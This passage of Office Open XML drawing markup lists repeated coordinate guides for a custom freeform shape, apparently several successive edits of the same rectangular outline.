              <a:gd name="connsiteX25" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY25" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY26" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 15349 w 4124033"/>
              <a:gd name="connsiteY27" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 2471 w 4124033"/>
              <a:gd name="connsiteY28" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 14853 w 4123537"/>
              <a:gd name="connsiteY0" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 4123537"/>
              <a:gd name="connsiteY1" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 8143 w 4123537"/>
              <a:gd name="connsiteY2" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 15646 w 4123537"/>
              <a:gd name="connsiteY3" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 23642 w 4123537"/>
              <a:gd name="connsiteY4" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY5" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY6" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 23354 w 4123537"/>
              <a:gd name="connsiteY7" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY8" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 22363 w 4123537"/>
              <a:gd name="connsiteY9" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY10" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 17480 w 4123537"/>
              <a:gd name="connsiteY11" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 42723 w 4123537"/>
              <a:gd name="connsiteY12" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 63578 w 4123537"/>
              <a:gd name="connsiteY13" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4085820 w 4123537"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4119347 w 4123537"/>
              <a:gd name="connsiteY15" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4119346 w 4123537"/>
              <a:gd name="connsiteY16" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4085819 w 4123537"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4068312 w 4123537"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4068312 w 4123537"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 63564 w 4123537"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY21" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY22" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 15547 w 4123537"/>
              <a:gd name="connsiteY23" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY24" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY25" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY26" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 14853 w 4123537"/>
              <a:gd name="connsiteY27" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 6714 w 4115398"/>
              <a:gd name="connsiteY0" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 4 w 4115398"/>
              <a:gd name="connsiteY1" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 7507 w 4115398"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 15503 w 4115398"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 15215 w 4115398"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 14224 w 4115398"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 9341 w 4115398"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 34584 w 4115398"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 55439 w 4115398"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4077681 w 4115398"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4111208 w 4115398"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4111207 w 4115398"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4077680 w 4115398"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4060173 w 4115398"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4060173 w 4115398"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 55425 w 4115398"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 7408 w 4115398"/>
              <a:gd name="connsiteY22" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY23" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY24" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY25" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 6714 w 4115398"/>
              <a:gd name="connsiteY26" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 293 w 4108977"/>
              <a:gd name="connsiteY0" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 18363 w 4108977"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 1086 w 4108977"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9082 w 4108977"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 8794 w 4108977"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 7803 w 4108977"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 2920 w 4108977"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 28163 w 4108977"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 49018 w 4108977"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4071260 w 4108977"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4104787 w 4108977"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4104786 w 4108977"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4071259 w 4108977"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4053752 w 4108977"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4053752 w 4108977"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 49004 w 4108977"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 987 w 4108977"/>
              <a:gd name="connsiteY22" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY23" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY24" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY25" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 293 w 4108977"/>
              <a:gd name="connsiteY26" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 17376 w 4107990"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 99 w 4107990"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 8095 w 4107990"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 7807 w 4107990"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 6816 w 4107990"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 1933 w 4107990"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 27176 w 4107990"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 48031 w 4107990"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4070273 w 4107990"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4103800 w 4107990"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4103799 w 4107990"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4070272 w 4107990"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4052765 w 4107990"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4052765 w 4107990"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 48017 w 4107990"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 0 w 4107990"/>
              <a:gd name="connsiteY22" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY23" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY24" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY25" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 17277 w 4107891"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 4107891"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 7996 w 4107891"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 7708 w 4107891"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 6717 w 4107891"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 1834 w 4107891"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 27077 w 4107891"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 47932 w 4107891"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4070174 w 4107891"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4103701 w 4107891"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4103700 w 4107891"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4070173 w 4107891"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 47918 w 4107891"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY22" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY23" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY24" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 17277 w 4107891"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 4107891"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 7996 w 4107891"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 7708 w 4107891"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 6717 w 4107891"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 1834 w 4107891"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 27077 w 4107891"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 47932 w 4107891"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4070174 w 4107891"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4103701 w 4107891"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4103700 w 4107891"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4070173 w 4107891"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 47918 w 4107891"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY22" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY23" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 17277 w 4107891"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 4107891"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 7996 w 4107891"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 7708 w 4107891"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 6717 w 4107891"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 1834 w 4107891"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 27077 w 4107891"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 47932 w 4107891"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4070174 w 4107891"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4103701 w 4107891"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4103700 w 4107891"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4070173 w 4107891"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 47918 w 4107891"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY21" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY22" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 15906 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6625 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 5346 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY19" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY20" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY21" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 15906 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6625 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 9074 w 4106520"/>
